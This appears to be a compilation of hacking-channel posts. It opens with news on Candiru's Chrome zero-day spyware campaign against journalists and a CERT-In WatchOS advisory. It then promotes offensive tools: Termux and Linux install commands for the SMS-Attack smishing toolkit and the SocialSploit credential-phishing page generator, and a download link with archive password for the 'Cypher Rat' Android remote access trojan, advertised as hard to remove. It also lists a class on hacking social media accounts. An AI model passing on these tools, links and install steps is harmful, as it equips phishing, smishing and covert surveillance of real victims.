*🔰Chrome Zero-day Abused to Spread Spyware to Target Journalists*🔰

The spyware vendor from Israel, Candiru, was discovered abusing a zero-day vulnerability in Google Chrome to spy on journalists and high-interest individuals from the Middle East, using a spyware called DevilsTongue.


*The abuse of zero-day*

Avast researchers spotted the vulnerability and reported it to Google. Further, they disclosed the details after examining DevilsTongue attacks on their clients.
Candiru started abusing the zero-day in March and targeting users in Palestine, Turkey, Yemen, and Lebanon.
The flaw, tracked as CVE-2022-2294, is a high-severity heap-based buffer overflow in WebRTC. Its successful exploitation may lead to code execution on the targeted device.
After being reported to Google, the tech firm patched the exploited zero-day on July 4, which has been under active exploitation in cyberattacks.

Since the bug exists in WebRTC, it also impacts Safari browser but the exploit found only work on Windows.

*Attack vectors*

The spyware operators have used watering holes and spear-phishing tactics in their attacks.
This attack requires no interaction with the victim, such as clicking on a link or downloading a file.
Instead, a user is made to open an already compromised website or the one created by hackers in a Chromium-based browser or Chrome.
In one instance, the attackers infected a website used by a news agency in Lebanon and inserted JavaScript snippets to enable XSS attacks, and redirected targets to the exploit server.
In the Lebanon case, the zero-day allowed shellcode execution inside a renderer process and further chained with a sandbox escape flaw that Avast failed to recover for investigation.

*What was the target?*

After the initial infection, the DevilsTongue spyware used a BYOVD (bring your own driver) step to elevate the privileges and achieve read and write rights to the infected device's memory. Researchers believe the cybercriminals used the spyware to learn about what news stories the targeted journalist are working on.

*Conclusion*

The recent report sheds light on the dangers of services offered by commercial spyware vendors. These vendors are developing or buying zero-day exploits to target people asked by their clients. Thus, always protect data with powerful encryption and update devices with the latest security updates.

India’s cyber-security agency 🇮🇳
The Indian Computer Emergency Response Team or CERT-In has warned of high vulnerabilities in the Apple Watch ecosystem.
The vulnerabilities would can allow hackers to bypass the company’s security measures that have been built into Apple’s WatchOS.

In an advisory, CERT-In has said that users should update their Watch OS to the latest security versions rolled out by the company. The vulnerabilities have been reported in versions of WatchOS prior to the 8.7 version.

🐞👁This Vulnerability might allow attackers:-

- To run arbitrary code and bypass security restrictions on the device.
- Could make use of this security flaw to execute commands on your device remotely.
- Allowing the attackers access to private information on the smartwatch.

*Topics*

*How to become an ethical hacker*
*How to do packet forging attack (Practical)*
*How to hack social media accounts using Tab Napping (Practical)*
*How to setup Whonix Gateway (Practical)*

Timing 5:00 PM



https://chat.whatsapp.com/FVL8m3bA3CX9kpOhXrbit5

*SMS-Attack*
A social engineering toolkit for performing smishing, and other sms attacks.
It was created by TheNooB and Spider Anongreyhat

*Note:*
*You can only send 1 sms daily*


*How to Install on termux*
apt update && apt upgrade

apt install python3

apt install git

apt install pip

git clone https://github.com/spider863644/SMS-Attack

pip install -r requirements.txt

python3 sms.py

*How to install on Linux*

sudo apt update && apt upgrade

sudo apt install python3

sudo apt install git

sudo apt install pip

git clone https://github.com/spider863644/SMS-Attack

sudo pip install -r requirements.txt

python3 sms.py

*Important Note:*
*If you are finding it difficult to send sms, just connect to a strong VPN and switch it to "USA"*

Cypher Rat New UPDATE

- New Tool: Request Admin Rights at runtime

- Admin rights: Help the apk to bypass battery optimization and keep app alive on background
+
Make Apk Harder To remove

- General Fix and improvement

- - - - - - - - - - - - - - -

Click Here to Download
https://www.mediafire.com/file/g1yqn616des7v3n/CypherRat-Update-7-24.rar/file

RAR PASSWORD: craxsrat.com

——————————

SocialSploit

SocialSploit is a Termux tool which using for make phishing page for access someone socialmedia Account like username , password....!

$ apt update -y

$ apt upgrade -y

$ apt install git

$ git clone https://github.com/Cesar-Hack-Gray/SocialSploit

$ cd SocialSploit

$ bash install.sh

$ ./Sploit